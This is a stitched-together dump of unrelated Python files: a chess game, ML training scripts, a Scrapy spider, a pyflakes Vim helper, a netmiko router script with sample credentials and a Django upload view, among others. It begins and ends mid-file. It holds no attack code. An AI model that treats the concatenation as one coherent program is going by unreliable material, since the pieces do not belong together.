User(ReadyForObject): def __init__(self, user_id=None, user_url=None, backed_at=None, name=None): if user_id is None and user_url is None: raise ValueError('no one of argument which must be supplied') elif user_id is not None: self.__id = user_id self.user_url = None elif user_url is not None: self.user_url = user_url self.__id = None # This property activate when this user is gotten from comment page of project. self.backed_at = backed_at self.setted_name = name @cached_property def from_user_page(self): user_identifier = "" if self.__id == "NoID": raise UserNoIDException("User id が NoID のときはUserページの情報を取りに行かないで下さい") if self.__id is not None: user_identifier = self.__id elif self.user_url is not None: user_identifier = self.user_url.split("/")[4] response = ReadyForConnection.call(objects_kind="users", object_id=user_identifier, param=None, method="GET") return html_parser.UserPageParser(response.text).parse() @cached_property def _id(self): if self.__id is not None: return self.__id elif self.user_url is not None: return self.user_url.split("/")[4] @property def name(self): if self.setted_name is not None: return self.setted_name else: return self.from_user_page["name"] @property def url(self): if self.user_url is not None: return self.user_url else: return "{domain}/{users}/{id}".format( domain="https://readyfor.jp", users="users", id=self.id ) @property def biography(self): return self.from_user_page["biography"] @property def sns_links(self): return self.from_user_page["sns_links"] print("HIIIIIIOOO") import importlib from .base_model import BaseModel print("HIIIIIIOOO") def find_model_using_name(model_name): # Given the option --model [modelname], # the file "models/modelname_model.py" # will be imported. # task_module = importlib.import_module(task_name) # model_filename = task_name + ".models." + model_name.lower() + "_model" model_filename = "models." + model_name.lower() + "_model" # modellib = importlib.import_module(model_filename, package=task_module) modellib = importlib.import_module(model_filename) # In the file, the class called ModelNameModel() will # be instantiated. It has to be a subclass of BaseModel, # and it is case-insensitive. model = None target_model_name = model_name.replace('_', '') + 'model' for name, cls in modellib.__dict__.items(): if name.lower() == target_model_name.lower() \ and next(iter(cls.__bases__)).__module__.endswith(BaseModel.__module__): # check that base class is BaseModel model = cls if model is None: raise NotImplementedError("In %s.py, there should be a subclass of BaseModel with class name that matches %s in lowercase." % (model_filename, target_model_name)) return model def get_option_setter(model_name): model_class = find_model_using_name(model_name) return model_class.modify_commandline_options def create_model(opt): instance = create_model_by_name(opt.model, opt) return instance def create_model_by_name(name, opt): model = find_model_using_name(name) instance = model(opt) print("model [%s] was created" % (instance.name())) return instance <gh_stars>1-10 ''' A networked real-time strategy game based on Chess ''' from kivy.app import App from kivy.clock import Clock, mainthread from kivy.config import Config from kivy.core.window import Window from kivy.uix.boxlayout import BoxLayout from kivy.uix.textinput import TextInput import env from board_view import BoardView from game_model import GameModel from net_engine import NetEngine from widgets import WrappedLabel, WrappedButton num_msg_lines = 3 if env.is_mobile else 8 class Game(BoxLayout): game_title = 'Chess Chase: No turns, no sight!' def __init__(self, **kwargs): super(Game, self).__init__(**kwargs) self.game_model = GameModel() self.game_model.king_captured = self.king_captured self.game_model.on_message.append(self.update_label) self.net_engine = NetEngine(self.game_model) self.score = [0, 0] self.board_view = BoardView(self.game_model) self.add_widget(self.board_view) self.game_model.on_init.append(self.board_view.reset) self.game_model.on_init.append(self.on_game_init) self.info_pane = BoxLayout(orientation='vertical', size_hint_min_y=500) self.add_widget(self.info_pane) row_args = {'size_hint': (1, 0), 'size_hint_min_y': 70} if not env.is_mobile: self.info_pane.add_widget(WrappedLabel(halign='center', text=self.game_title, **row_args)) self.button_pane = BoxLayout(orientation='vertical', size_hint=(1, .4)) self.info_pane.add_widget(self.button_pane) self.button_pane.add_widget(WrappedButton( halign='center', text='Tutorial: How to play', on_press=self.start_tutorial)) self.button_pane.add_widget(WrappedButton( halign='center', text='Start Game' if env.is_mobile else 'Start Game: Play with friends', on_press=self.start_game)) self.score_label = WrappedLabel( halign='center', **row_args) self.info_pane.add_widget(self.score_label) self.label = WrappedLabel(halign='center', valign='bottom') self.info_pane.add_widget(self.label) self.text_input = TextInput( multiline=False, text_validate_unfocus=env.is_mobile, **row_args) self.text_input.bind(on_text_validate=self.handle_text_input) if env.is_mobile: self.text_input.keyboard_mode = 'managed' def on_focus(*args): if self.text_input.focus: self.text_input.show_keyboard() else: def on_focus(*args): if not self.text_input.focus: # Steal focus self.text_input.focus = True self.text_input.bind(focus=on_focus) self.info_pane.add_widget(self.text_input) self.game_model.add_message('') self.game_model.add_message(self.game_title if env.is_mobile else 'Welcome to Chess Chase!') self.bind(size=self.resized) Clock.schedule_interval(self.on_clock, 1/30) @mainthread def on_game_init(self): if env.is_mobile and self.game_model.mode == 'play': self.text_input.hide_keyboard() def stop_net_engine(self): if not self.net_engine: return self.net_engine.should_stop = True def restart_net_engine(self): self.stop_net_engine() self.net_engine = NetEngine(self.game_model) def start_game(self, _): self.text_input.focus = True if env.is_mobile: self.text_input.show_keyboard() self.game_model.mode = 'connect' self.score = [0, 0] self.restart_net_engine() self.game_model.messages.clear() self.game_model.add_message('Establishing server connection...') self.game_model.init() self.net_engine.start() def start_tutorial(self, i): if env.is_mobile: self.text_input.hide_keyboard() self.game_model.mode = 'tutorial' self.game_model.reset() self.restart_net_engine() self.game_model.messages.clear() self.game_model.add_message('Move the chess pieces and see what happens!') self.game_model.tutorial_messages = [ 'Keep moving the pieces at your own pace.', 'Each piece has its own color, and the board is painted to show where it can move.', 'You only see where your pieces can move', 'You will also see any piece that threatens the king.', 'Note that unlike classic chess, the king can move to a threatened position!', 'There are no turns!', 'There are cool-downs (rate limits) instead.', 'You win the game by capturing the opponent king', 'The game is played with friends over the internet.', 'To start a game both you and your friend need to click "Start Game".', 'Then either you or the friend should type the game identifier that the other was given.', 'This concludes our tutorial!', ] self.game_model.init() self.game_model.players[self.game_model.my_id] = 0 self.net_engine.iter_actions = {} def update_label(self): self.score_label.text = 'White: %d Black: %d' % tuple(self.score) self.label.text = '\n'.join(self.game_model.messages[-num_msg_lines:]) def resized(self, *args): self.orientation = 'horizontal' if self.size[0] > self.size[1] else 'vertical' p = 1/3 if self.orientation == 'horizontal': self.info_pane.size_hint = (p, 1) self.board_view.size_hint = (self.game_model.num_boards, 1) self.button_pane.orientation = 'vertical' self.button_pane.size_hint = (1, .4) self.button_pane.size_hint_min_y = 140 else: self.info_pane.size_hint = (1, p) self.board_view.size_hint = (1, 1 / self.game_model.num_boards) self.button_pane.orientation = 'horizontal' self.button_pane.size_hint = (1, .4) self.button_pane.size_hint_min_y = 70 def handle_text_input(self, entry): if env.is_mobile: self.text_input.hide_keyboard() command = entry.text entry.text = '' if not command: return if command[:1] == '/': if command == '/help': self.game_model.help() return self.game_model.add_action(*command[1:].split()) return if self.game_model.mode in [None, 'connect']: self.net_engine.connect(command) return # Chat self.game_model.add_action('msg', command) def king_captured(self, who): if self.game_model.mode == 'replay': return winner = 1 - who%2 self.score[winner] += 1 self.game_model.add_message('') self.game_model.add_message('%s King Captured!' % self.game_model.player_str(who)) self.game_model.add_message('%s wins!' % self.game_model.player_str(winner)) self.net_engine.start_replay() def on_clock(self, _interval): self.net_engine.iteration() self.board_view.update_dst() self.board_view.show_board() class ChessChaseApp(App): def build(self): self.game = Game() if not env.is_mobile: self.game.text_input.focus = True return self.game def stop(self): self.game.stop_net_engine() if __name__ == '__main__': Config.set('input', 'mouse', 'mouse,multitouch_on_demand') Window.softinput_mode = 'pan' ChessChaseApp().run() <filename>pages/create_tasknotes_page.py<gh_stars>0 from pages.create_task_page import CreateTaskPage from utils.locators import * from pages.base_page import BasePage class CreateTaskNotesPage(BasePage): def __init__(self, driver): self.locator = CreateTaskNotesLocators super(CreateTaskNotesPage, self).__init__(driver) def enter_notes_name(self, notes): self.find_element(*self.locator.enter_notes_input).clear() self.find_element(*self.locator.enter_notes_input).send_keys(notes) def click_next_week_button(self): self.wait_element(*self.locator.next_week_button) self.find_element(*self.locator.next_week_button).click() def click_personal_option_button(self): self.wait_element(*self.locator.personal_option_button) self.find_element(*self.locator.personal_option_button).click() <filename>simulators/markov_jump_processes.py<gh_stars>10-100 from __future__ import division import numpy as np import util.math class SimTooLongException(Exception): """ Exception to be thrown when a simulation runs for too long. """ def __init__(self, max_n_steps): self.max_n_steps = max_n_steps def __str__(self): return 'Simulation exceeded the maximum of {} steps.'.format(self.max_n_steps) class MarkovJumpProcess: """ Implements a generic Markov Jump Process. It's an abstract class and must be implemented by a subclass. """ def __init__(self, init, params): """ :param init: initial state :param params: parameters """ self.state = None self.params = None self.time = None self.reset(init, params) def reset(self, init, params): """ Resets the simulator. :param init: initial state :param params: parameters """ self.state = np.asarray(init, dtype=float) self.params = np.asarray(params, dtype=float) self.time = 0.0 def _calc_propensities(self): raise NotImplementedError('This is an abstract method and should be implemented in a subclass.') def _do_reaction(self, reaction): raise NotImplementedError('This is an abstract method and should be implemented in a subclass.') def sim_steps(self, num_steps, include_init_state=True, rng=np.random): """ Runs the simulator for a given number of steps. :param num_steps: number of steps :param include_init_state: if True, include the initial state in the output :param rng: random number generator to use :return: times, states """ times = [self.time] states = [self.state.copy()] for _ in xrange(num_steps): rates = self.params * self._calc_propensities() total_rate = rates.sum() if total_rate == 0: self.time = float('inf') break self.time += rng.exponential(scale=1./total_rate) reaction = util.math.discrete_sample(rates / total_rate, rng=rng) self._do_reaction(reaction) times.append(self.time) states.append(self.state.copy()) if not include_init_state: times, states = times[1:], states[1:] return np.array(times), np.array(states) def sim_time(self, dt, duration, include_init_state=True, max_n_steps=float('inf'), rng=np.random): """ Runs the simulator for a given amount of time. :param dt: time step :param duration: total amount of time :param include_init_state: if True, include the initial state in the output :param max_n_steps: maximum number of simulator steps allowed. If exceeded, an exception is thrown. :param rng: random number generator to use :return: states """ num_rec = int(duration / dt) + 1 states = np.empty([num_rec, self.state.size], float) cur_time = self.time n_steps = 0 for i in xrange(num_rec): while cur_time > self.time: rates = self.params * self._calc_propensities() total_rate = rates.sum() if total_rate == 0: self.time = float('inf') break self.time += rng.exponential(scale=1./total_rate) reaction = util.math.discrete_sample(rates / total_rate, rng=rng) self._do_reaction(reaction) n_steps += 1 if n_steps > max_n_steps: raise SimTooLongException(max_n_steps) states[i] = self.state.copy() cur_time += dt return states if include_init_state else states[1:] class LotkaVolterra(MarkovJumpProcess): """ The Lotka-Volterra implementation of the Markov Jump Process. """ def _calc_propensities(self): x, y = self.state xy = x * y return np.array([xy, x, y, xy]) def _do_reaction(self, reaction): if reaction == 0: self.state[0] += 1 elif reaction == 1: self.state[0] -= 1 elif reaction == 2: self.state[1] += 1 elif reaction == 3: self.state[1] -= 1 else: raise ValueError('Unknown reaction.') <reponame>leewckk/vim.configuration """ Code for running pyflakes checks in Vim buffer The main function is ``check``, which runs the pyflakes check on a buffer. """ import sys import ast from operator import attrgetter import re from pyflakes import checker, messages try: # Vim module available within vim import vim except ImportError: # Otherwise, mock it up for tests from mock import Mock vim = Mock() class loc(object): def __init__(self, lineno, col=None): self.lineno = lineno self.col_offset = col class SyntaxError(messages.Message): message = 'could not compile: %s' def __init__(self, filename, lineno, col, message): messages.Message.__init__(self, filename, loc(lineno, col)) self.message_args = (message,) self.lineno = lineno class blackhole(object): write = flush = lambda *a, **k: None def check(buffer): filename = buffer.name contents = buffer[:] # shebang usually found at the top of the file, followed by source code encoding marker. # assume everything else that follows is encoded in the encoding. for n, line in enumerate(contents): if n >= 2: break elif re.match(r'#.*coding[:=]\s*([-\w.]+)', line): contents = ['']*(n+1) + contents[n+1:] break contents = '\n'.join(contents) + '\n' vimenc = vim.eval('&encoding') if vimenc and hasattr(contents, 'decode'): contents = contents.decode(vimenc) builtins = set(['__file__']) try: builtins.update(set(eval(vim.eval('string(g:pyflakes_builtins)')))) except Exception: pass try: # TODO: use warnings filters instead of ignoring stderr old_stderr, sys.stderr = sys.stderr, blackhole() try: tree = ast.parse(contents, filename or '<unknown>') finally: sys.stderr = old_stderr except: exc_value = sys.exc_info()[1] try: lineno, offset, line = exc_value.args[1][1:] except IndexError: lineno, offset, line = 1, 0, '' if line and line.endswith("\n"): line = line[:-1] return [SyntaxError(filename, lineno, offset, str(exc_value))] else: # pyflakes looks to _MAGIC_GLOBALS in checker.py to see which # UndefinedNames to ignore old_globals = getattr(checker,' _MAGIC_GLOBALS', []) checker._MAGIC_GLOBALS = set(old_globals) | builtins filename = '(none)' if filename is None else filename w = checker.Checker(tree, filename) checker._MAGIC_GLOBALS = old_globals w.messages.sort(key = attrgetter('lineno')) return w.messages def vim_quote(s): return s.replace("'", "''") <gh_stars>10-100 from icevision.metrics.jaccard_index.binary_jaccard_index import * <filename>main-lenet5.py #!/usr/bin/env python3 # -*- coding: utf-8 -*- # @Date : May-18-20 # @Update : Sep-09-20 # @Author : <NAME> (<EMAIL>) # @RefLink : https://github.com/KellyHwong/kaggle_digit_recognizer # @RefLink : https://www.kaggle.com/c/digit-recognizer import os import datetime import pandas as pd import numpy as np import torch from torch import nn, optim from torch.autograd import Variable import torch.nn.functional as F from torchvision import datasets, transforms from sklearn.utils import shuffle from torch_fn.model import LeNet5 from torch_fn.data_loader import load_data from utils.dir_utils import makedir_exist_ok def main(): # paths competition_name = "digit-recognizer" data_dir = os.path.expanduser(f"~/.kaggle/competitions/{competition_name}") ckpt_dir = os.path.expanduser( f"~/Documents/DeepLearningData/{competition_name}/ckpts") log_dir = os.path.expanduser( f"~/Documents/DeepLearningData/{competition_name}/logs") makedir_exist_ok(ckpt_dir) makedir_exist_ok(log_dir) # experiment time date_time = datetime.datetime.now().strftime("%Y%m%d-%H%M%S") # load data train_images, train_labels, test_images = load_data( data_dir) # train_images: N, H, W num_train = train_images.shape[0] num_test = test_images.shape[0] # TODO data_transforms = { 'train': transforms.Compose([ transforms.ToTensor() ]), 'val': transforms.Compose([ transforms.ToTensor() ]), } # training parameters IF_FAST_RUN = True start_epoch = 0 # epochs = input("input training epochs: ") # user epochs epochs = 1 if IF_FAST_RUN else epochs # fast run epochs batch_size = 32 use_gpu = torch.cuda.is_available() # prepare model, LeNet-5 model_type = "LeNet-5" model = LeNet5() print(f"Using model: {model_type}.") model.train() # training model_ckpt_dir = os.path.join( ckpt_dir, model_type, date_time) # weights save path makedir_exist_ok(model_ckpt_dir) # TODO not implemented # train_loader = torch.utils.data.DataLoader(dataset=data_train, # batch_size=batch_size, # shuffle=True, num_workers=4) # model and model properties model = LeNet5() steps_per_epoch = int(np.ceil(num_train/batch_size)) use_gpu = torch.cuda.is_available() model = model.cuda() if use_gpu else model # to GPU model.train() criterion = nn.CrossEntropyLoss(size_average=False) optimizer = torch.optim.Adam( model.parameters(), lr=1e-3, betas=(0.9, 0.99)) for epoch in range(epochs): for step in range(steps_per_epoch): _batch_size = batch_size # tmp batch_size if (step+1) * batch_size >= num_train: _batch_size = num_train - step*batch_size # take left samples batch_idx = np.arange(step*batch_size, step*batch_size+_batch_size) X_batch = train_images[batch_idx] # train_images is N, H, W, C y_batch = train_labels[batch_idx] # to Tensor X_batch, y_batch = torch.from_numpy( X_batch).float(), torch.from_numpy(y_batch).long() X_batch = X_batch.permute(0, 3, 1, 2) # permute it to N, C, H, W if use_gpu: # to GPU X_batch, y_batch = X_batch.cuda(), y_batch.cuda() optimizer.zero_grad() output = model(X_batch) loss = criterion(output, y_batch) loss.backward() optimizer.step() # args.log_interval log_interval = 100 if step % log_interval == 0: trained_samples = step*batch_size + _batch_size print( f"Training Epoch: [{epoch+1}/{epochs}]. Step: [{step+1}/{steps_per_epoch}]. Samples: [{trained_samples}/{num_train} ({trained_samples/num_train*100: .2f} % )]. Loss: {loss: .6f}" ) latest_weights_path = os.path.join( model_ckpt_dir, f"{model_type}-latest-weights.pth") torch.save(model.state_dict(), latest_weights_path) print(f"Model saved to {latest_weights_path}.") if __name__ == "__main__": main() from statistics import median with open("day-10.txt") as f: nav_sys = f.read().rstrip().splitlines() pairs = { ")": "(", "]": "[", "}": "{", ">": "<", } points = { "(": 1, "[": 2, "{": 3, "<": 4, } scores = [] for line in nav_sys: brackets = [] for char in line: if char in pairs: if brackets and pairs[char] == brackets[-1]: brackets.pop() else: break else: brackets.append(char) else: score = 0 for b in reversed(brackets): score = score * 5 + points[b] scores.append(score) print(median(scores)) # Copyright (C) 2010-2011 <NAME> # # Permission is hereby granted, free of charge, to any person obtaining a copy # of this software and associated documentation files (the "Software"), to # deal in the Software without restriction, including without limitation the # rights to use, copy, modify, merge, publish, distribute, sublicense, and/or # sell copies of the Software, and to permit persons to whom the Software is # furnished to do so, subject to the following conditions: # # The above copyright notice and this permission notice shall be included in # all copies or substantial portions of the Software. # # THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR # IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, # FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE # AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER # LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING # FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS # IN THE SOFTWARE. from CIM14.IEC61970.Core.PowerSystemResource import PowerSystemResource class HydroPump(PowerSystemResource): """A synchronous motor-driven pump, typically associated with a pumped storage plant """ def __init__(self, pumpPowerAtMaxHead=0.0, pumpPowerAtMinHead=0.0, pumpDischAtMinHead=0.0, pumpDischAtMaxHead=0.0, SynchronousMachine=None, HydroPumpOpSchedule=None, HydroPowerPlant=None, *args, **kw_args): """Initialises a new 'HydroPump' instance. @param pumpPowerAtMaxHead: The pumping power under maximum head conditions, usually at full gate @param pumpPowerAtMinHead: The pumping power under minimum head conditions, usually at full gate. @param pumpDischAtMinHead: The pumping discharge (m3/sec) under minimum head conditions, usually at full gate @param pumpDischAtMaxHead: The pumping discharge (m3/sec) under maximum head conditions, usually at full gate @param SynchronousMachine: The synchronous machine drives the turbine which moves the water from a low elevation to a higher elevation. The direction of machine rotation for pumping may or may not be the same as for generating. @param HydroPumpOpSchedule: The hydro pump has a pumping schedule over time, indicating when pumping is to occur. @param HydroPowerPlant: The hydro pump may be a member of a pumped storage plant or a pump for distributing water """ #: The pumping power under maximum head conditions, usually at full gate self.pumpPowerAtMaxHead = pumpPowerAtMaxHead #: The pumping power under minimum head conditions, usually at full gate. self.pumpPowerAtMinHead = pumpPowerAtMinHead #: The pumping discharge (m3/sec) under minimum head conditions, usually at full gate self.pumpDischAtMinHead = pumpDischAtMinHead #: The pumping discharge (m3/sec) under maximum head conditions, usually at full gate self.pumpDischAtMaxHead = pumpDischAtMaxHead self._SynchronousMachine = None self.SynchronousMachine = SynchronousMachine self._HydroPumpOpSchedule = None self.HydroPumpOpSchedule = HydroPumpOpSchedule self._HydroPowerPlant = None self.HydroPowerPlant = HydroPowerPlant super(HydroPump, self).__init__(*args, **kw_args) _attrs = ["pumpPowerAtMaxHead", "pumpPowerAtMinHead", "pumpDischAtMinHead", "pumpDischAtMaxHead"] _attr_types = {"pumpPowerAtMaxHead": float, "pumpPowerAtMinHead": float, "pumpDischAtMinHead": float, "pumpDischAtMaxHead": float} _defaults = {"pumpPowerAtMaxHead": 0.0, "pumpPowerAtMinHead": 0.0, "pumpDischAtMinHead": 0.0, "pumpDischAtMaxHead": 0.0} _enums = {} _refs = ["SynchronousMachine", "HydroPumpOpSchedule", "HydroPowerPlant"] _many_refs = [] def getSynchronousMachine(self): """The synchronous machine drives the turbine which moves the water from a low elevation to a higher elevation. The direction of machine rotation for pumping may or may not be the same as for generating. """ return self._SynchronousMachine def setSynchronousMachine(self, value): if self._SynchronousMachine is not None: self._SynchronousMachine._HydroPump = None self._SynchronousMachine = value if self._SynchronousMachine is not None: self._SynchronousMachine.HydroPump = None self._SynchronousMachine._HydroPump = self SynchronousMachine = property(getSynchronousMachine, setSynchronousMachine) def getHydroPumpOpSchedule(self): """The hydro pump has a pumping schedule over time, indicating when pumping is to occur. """ return self._HydroPumpOpSchedule def setHydroPumpOpSchedule(self, value): if self._HydroPumpOpSchedule is not None: self._HydroPumpOpSchedule._HydroPump = None self._HydroPumpOpSchedule = value if self._HydroPumpOpSchedule is not None: self._HydroPumpOpSchedule.HydroPump = None self._HydroPumpOpSchedule._HydroPump = self HydroPumpOpSchedule = property(getHydroPumpOpSchedule, setHydroPumpOpSchedule) def getHydroPowerPlant(self): """The hydro pump may be a member of a pumped storage plant or a pump for distributing water """ return self._HydroPowerPlant def setHydroPowerPlant(self, value): if self._HydroPowerPlant is not None: filtered = [x for x in self.HydroPowerPlant.HydroPumps if x != self] self._HydroPowerPlant._HydroPumps = filtered self._HydroPowerPlant = value if self._HydroPowerPlant is not None: if self not in self._HydroPowerPlant._HydroPumps: self._HydroPowerPlant._HydroPumps.append(self) HydroPowerPlant = property(getHydroPowerPlant, setHydroPowerPlant) # Generated by Django 3.0.3 on 2021-02-25 07:34 from django.db import migrations, models class Migration(migrations.Migration): dependencies = [ ('workspaces', '0009_workspacegeneralsettings_import_categories'), ] operations = [ migrations.AddField( model_name='workspacegeneralsettings', name='auto_create_destination_entity', field=models.BooleanField(default=False, help_text='Auto create vendor / employee'), ), ] #!/usr/bin/env python # -*- coding: utf-8 -*- # Created by HazzaCheng on 2019-09-22 import time from typing import Any import logging import sys nesting_level = 0 def log_old(entry: Any): global nesting_level space = "-" * (4 * nesting_level) print("{}{}".format(space, entry)) def get_logger(verbosity_level): """Set logging format to something like: 2019-04-25 12:52:51,924 INFO model.py: <message> """ logger = logging.getLogger(__file__) logging_level = getattr(logging, verbosity_level) logger.setLevel(logging_level) # formatter = logging.Formatter( # fmt='%(asctime)s %(levelname)s %(filename)s: %(message)s') formatter = logging.Formatter('%(asctime)s | %(filename)s:%(lineno)d | %(levelname)s | %(message)s') stdout_handler = logging.StreamHandler(sys.stdout) stdout_handler.setLevel(logging_level) stdout_handler.setFormatter(formatter) stderr_handler = logging.StreamHandler(sys.stderr) stderr_handler.setLevel(logging.WARNING) stderr_handler.setFormatter(formatter) logger.addHandler(stdout_handler) logger.addHandler(stderr_handler) logger.propagate = False return logger logger = get_logger('INFO') log = logger.info log_warning = logger.warning info = logger.info def timeit(method, start_log=None): def wrapper(*args, **kw): global nesting_level log("Start [{}]:" + (start_log if start_log else "").format(method.__name__)) nesting_level += 1 start_time = time.time() result = method(*args, **kw) end_time = time.time() nesting_level -= 1 log("End [{}]. Time elapsed: {:0.2f} sec.".format(method.__name__, end_time - start_time)) return result return wrapper <reponame>yuheng-json/Scrapy-ProjectAll # -*- coding: utf-8 -*- import scrapy from movie.items import MovieItem ''' 需求:爬取电影天堂 一级页面和二级页面的数据 该数据存储到一个item对象中 一级页面 title //div[@class="co_content8"]//table//a/text() href //div[@class="co_content8"]//table//a/@href http://www.ygdy8.net/html/gndy/dyzz/20181025/57658.html 二级页面 src //div[@id="Zoom"]/span/p[1]/img[1]/@src ''' class MvSpider(scrapy.Spider): name = 'mv' allowed_domains = ['www.ygdy8.net'] start_urls = ['http://www.ygdy8.net/html/gndy/dyzz/index.html'] #该方法的返回值类型 是一个可以迭代的对象 def parse(self, response): a_list = response.xpath('//div[@class="co_content8"]//table//a') for a in a_list: #要注意关注seletor对象中的data属性值 title = a.xpath('./text()').extract_first() href = a.xpath('./@href').extract_first() url = 'http://www.ygdy8.net' + href movie = MovieItem(title=title) #yield Request(参数) url 发送的请求 callback 执行的方法 meta就是 响应时候携带的参数 yield scrapy.Request(url=url,callback=self.parse_detail,meta={'movie':movie}) #response就是Request方法中url执行之后的响应 def parse_detail(self,response): movie = response.meta['movie'] src = response.xpath('//div[@id="Zoom"]//p[1]/img[1]/@src').extract_first() movie['src']=src yield movie # if you use the default maze client import mazeClient def main(): pass if __name__ == "__main__": main() from Xlib import XK # Convert strings to keysyms str_to_keysym = { 'left': XK.XK_Left, 'right': XK.XK_Right, 'up': XK.XK_Up, 'down': XK.XK_Down, 't': XK.XK_T, 'e': XK.XK_E, 'x': XK.XK_X, 'escape': XK.XK_Escape, } """interpreter """ import librosa import numpy as np import pretty_midi from matplotlib import lines as mlines, pyplot as plt def jams_to_midi(jam, q=1): # q = 1: with pitch bend. q = 0: without pitch bend. midi = pretty_midi.PrettyMIDI() annos = jam.search(namespace='pitch_midi') for anno in annos: midi_ch = pretty_midi.Instrument(program=25) for note in anno: pitch = int(round(note.value)) bend_amount = int(round((note.value - pitch) * 4096)) st = note.time dur = note.duration n = pretty_midi.Note( velocity=100 + np.random.choice(range(-5, 5)), pitch=pitch, start=st, end=st + dur ) pb = pretty_midi.PitchBend(pitch=bend_amount*q, time=st) midi_ch.notes.append(n) midi_ch.pitch_bends.append(pb) if len(midi_ch.notes) != 0: midi.instruments.append(midi_ch) return midi def sonify_jams(jam, fpath='resources/sonify_out/test.wav', q=1): midi = jams_to_midi(jam, q) # q=1 : with pitchbend signal_out = midi.fluidsynth() librosa.output.write_wav(fpath, signal_out, 44100) return fpath def visualize_jams(jam): style_dict = {0 : 'r', 1 : 'y', 2 : 'b', 3 : '#FF7F50', 4 : 'g', 5 : '#800080'} string_dict = {0: 'E', 1: 'A', 2: 'D', 3: 'G', 4: 'B', 5: 'e' } s = 0 handle_list = [] for string_tran in jam.search(namespace='pitch_midi'): handle_list.append(mlines.Line2D([], [], color=style_dict[s], label=string_dict[s])) for note in string_tran: start_time = note[0] midi_note = note[2] dur = note[1] plt.plot([start_time, start_time + dur], [midi_note, midi_note], style_dict[s], label=string_dict[s]) s += 1 plt.xlabel('Time (sec)') plt.ylabel('Pitch (midi note number)') plt.legend(loc='center left', bbox_to_anchor=(1, 0.5), handles=handle_list) plt.show() def tablaturize_jams(jam): str_midi_dict = {0: 40, 1: 45, 2: 50, 3: 55, 4: 59, 5: 64} style_dict = {0 : 'r', 1 : 'y', 2 : 'b', 3 : '#FF7F50', 4 : 'g', 5 : '#800080'} s = 0 for string_tran in jam.search(namespace='pitch_midi'): for note in string_tran: start_time = note[0] midi_note = note[2] fret = int(round(midi_note - str_midi_dict[s])) plt.scatter(start_time, s, marker="${}$".format(fret), color = style_dict[s]) s += 1 plt.xlabel('Time (sec)') plt.ylabel('String Number') plt.title(jam.file_metadata.title) plt.show() from gpt2.training import Recorder def test_recorder_record(): recorder = Recorder() recorder.record({'metric1': 0, 'metric2': 1}) recorder.record({'metric1': 1, 'metric2': 5}) recorder.record({'metric1': 2, 'metric2': 9}) # The below values would be recorded in different scope. recorder.record({'metric1': 0, 'metric2': 1}, scope='scope') recorder.record({'metric1': 1, 'metric2': 3}, scope='scope') recorder.record({'metric1': 2, 'metric2': 5}, scope='scope') recorder.record({'metric1': 3, 'metric2': 7}, scope='scope') assert recorder.batch_metrics == { 'metric1': [0, 1, 2], 'metric2': [1, 5, 9], 'scope/metric1': [0, 1, 2, 3], 'scope/metric2': [1, 3, 5, 7]} def test_recorder_stamp(): recorder = Recorder() recorder.record({'metric1': 0, 'metric2': 1}) recorder.record({'metric1': 1, 'metric2': 5}) recorder.record({'metric1': 2, 'metric2': 9}) # The below values would be recorded in different scope. recorder.record({'metric1': 0, 'metric2': 1}, scope='scope') recorder.record({'metric1': 1, 'metric2': 3}, scope='scope') recorder.record({'metric1': 2, 'metric2': 5}, scope='scope') recorder.record({'metric1': 3, 'metric2': 7}, scope='scope') recorder.stamp(step=1) assert recorder.metrics == { 'metric1': [(1, 1)], 'metric2': [(1, 5)], 'scope/metric1': [(1, 1.5)], 'scope/metric2': [(1, 4)]} def test_recorder_format(): recorder = Recorder() recorder.record({'metric1': 0, 'metric2': 1}, scope='scope') recorder.record({'metric1': 1, 'metric2': 3}, scope='scope') recorder.record({'metric1': 2, 'metric2': 5}, scope='scope') recorder.record({'metric1': 3, 'metric2': 7}, scope='scope') recorder.stamp(step=1) assert (recorder.format('{scope_metric1:.1f}:{scope_metric2:.1f}') == '1.5:4.0') # The recorder formats the string with last-stamped metrics, so the # formatted string will be modified. recorder.record({'metric1': 7, 'metric2': 5}, scope='scope') recorder.record({'metric1': 8, 'metric2': 7}, scope='scope') recorder.record({'metric1': 9, 'metric2': 9}, scope='scope') recorder.record({'metric1': 10, 'metric2': 11}, scope='scope') recorder.stamp(step=1) assert (recorder.format('{scope_metric1:.1f}:{scope_metric2:.1f}') == '8.5:8.0') from functools import singledispatch from netmiko import ConnectHandler import yaml from pprint import pprint from collections.abc import Iterable @singledispatch def send_commands(command, device): print("singledispatch") raise NotImplementedError("Поддерживается только строка или iterable") # send_commands = singledispatch(send_commands) @send_commands.register def _(show_command: str, device): print("Аргумент строка") with ConnectHandler(**device) as ssh: ssh.enable() result = ssh.send_command(show_command) return result @send_commands.register def _(config_commands: Iterable, device): print("Аргумент iterable") with ConnectHandler(**device) as ssh: ssh.enable() result = ssh.send_config_set(config_commands) return result if __name__ == "__main__": commands = ["logging 10.255.255.1", "logging buffered 20010", "no logging console"] show_command = "sh ip int br" r1 = { "device_type": "cisco_ios", "username": "cisco", "password": "<PASSWORD>", "secret": "cisco", "ip": "192.168.100.1", } send_commands(tuple(commands), r1) send_commands(show_command, r1) <reponame>istommao/django-simditor """simditor views.""" from __future__ import absolute_import import os from datetime import datetime from django.conf import settings from django.core.files.storage import default_storage from django.http import JsonResponse from django.views import generic from django.views.decorators.csrf import csrf_exempt from . import utils, image_processing def get_upload_filename(upload_name): # Generate date based path to put uploaded file. date_path = datetime.now().strftime('%Y/%m/%d') # Complete upload path (upload_path + date_path). upload_path = os.path.join(settings.SIMDITOR_UPLOAD_PATH, date_path) if getattr(settings, 'SIMDITOR_UPLOAD_SLUGIFY_FILENAME', True): upload_name = utils.slugify_filename(upload_name) return default_storage.get_available_name(os.path.join(upload_path, upload_name)) def upload_handler(request): files = request.FILES upload_config = settings.SIMDITOR_CONFIGS.get( 'upload', {'fileKey': 'upload'}) filekey = upload_config.get('fileKey', 'upload') uploaded_file = files.get(filekey) if not uploaded_file: retdata = {'file_path': '', 'success': False, 'msg': '图片上传失败,无法获取到图片对象!'} return JsonResponse(retdata) image_size = upload_config.get('image_size') if image_size and uploaded_file.size > image_size: retdata = {'file_path': 